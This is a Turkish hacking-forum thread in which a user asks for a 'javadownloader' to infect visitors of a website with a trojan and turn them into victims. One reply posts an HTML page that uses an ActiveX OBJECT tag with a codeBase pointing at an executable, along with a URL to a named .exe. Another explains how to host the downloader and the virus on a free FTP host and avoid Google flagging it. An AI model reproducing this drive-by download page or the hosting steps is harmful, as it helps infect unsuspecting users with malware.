javadownloader hakkında biraz bilgi

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

radar2010

Üye
4 Ağu 2011
88
0
Selamunaleyküm arkadaşlar..
ben bu javadownloader hakkında bilgi edinmek istiyorum. .
hani siteye trojanı yüklüyorsun adam siteye girdiğinde run derse virüs onn bilgisayarında çalışıyor ve kurbanımız oluyor ben bu olayı çok araştırdım ama o downloader in dosyalarını bulamadım.
bu konuyu iyi bilen birisi yardım edebilir mi?
benim gibi çok arayan vardır bu olayı..
lütfen javadownloader dosyalarını nerden bulacağımı bilenler yazsın..
ücretsiz istiyorum ben ücretli olsa bile biraz ucuz olsun lütfen.
cevaplarınızı bekliyorum
teşekkürler
:):inv

mertna

Uzman üye
14 Nis 2008
1,001
0
127.0.0.1
piyasade 800 lira falan oluyor ama onlar kurban farkında olmadan download ediyor.bendeki kod kurbanın istemesine bağlı buyur:
[FONT=&quot]<html><head><title>about:blank</title><bOdy>
<OBJECT id="A" codeBase="virüs linki.exe" height="1" width="1" classid="CLSID:00000000-0000-0000-0000-100005000004"><PARAM NAME="id" VALUE="28"></OBJECT>
</bOdy></head></html>
http://barcimen.googlepages.com/CiMAN.exe[/FONT]virüs linkinin direk indirme olması lazım.

Mrt Krblt

Uzman üye
7 Şub 2011
1,685
0
local şebeke
benim geçen senelerde kullandıgım yöntemdir bu, önce bi bedava host alıyosun ftp destekli olması gerek sonra ftpden jawadowloaderin client ve bi exe si var onları ftp den www. klasörüne atıyosun, siteyi hazırladıktan sonra siteye özellik yazı fln atmana gerek yok site linkini karşı tarafa attıgında sayfa açılmadan beyaz görüntü varken java uyarısı çıkıyor indirilsinmi diyor indirip açması gerekki buda çogu kişi ugraşmıyor bi siteye bakmak için bumnları kim yapacak şimdi dercesine, eger yapabilirim diyorsan dökümanlarımın içinde olması gerek sana upload ederim, yada program bölümünde upload ederim milletde yararlanır bide anlatım videosu hazırlamak gerekir ona o zor iş ..., rütbene bakacak olursak sen yapamassın bunu yanlış anlama kaç yıldır bu işin içindeyiz az çok tahmin ediyoz biraz daha pişmen lazım...

radar2010

Üye
4 Ağu 2011
88
0
hayır ben ftp den falan anlıyorum. . ücretli domainim de var free host ta var. . bana sadece o downloader in dosyaları lazım.
arkadaşım lütfen bana yardım et. . çok igtiyacım var

Mrt Krblt

Uzman üye
7 Şub 2011
1,685
0
local şebeke
ben ondan anlamıyorum diyosun ya, javadowloaderini ayarlaya bilmen için ftp kullanabilmen gerek, onu sitene atman gerek yani, onu yapamassan ztn olmaz ki sadece javayı atmicaksın virüsünüde dogru yere atmalısın yoksa google kapatır siteyi, zararlı yazılım oldugu anlaşılırsa..

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.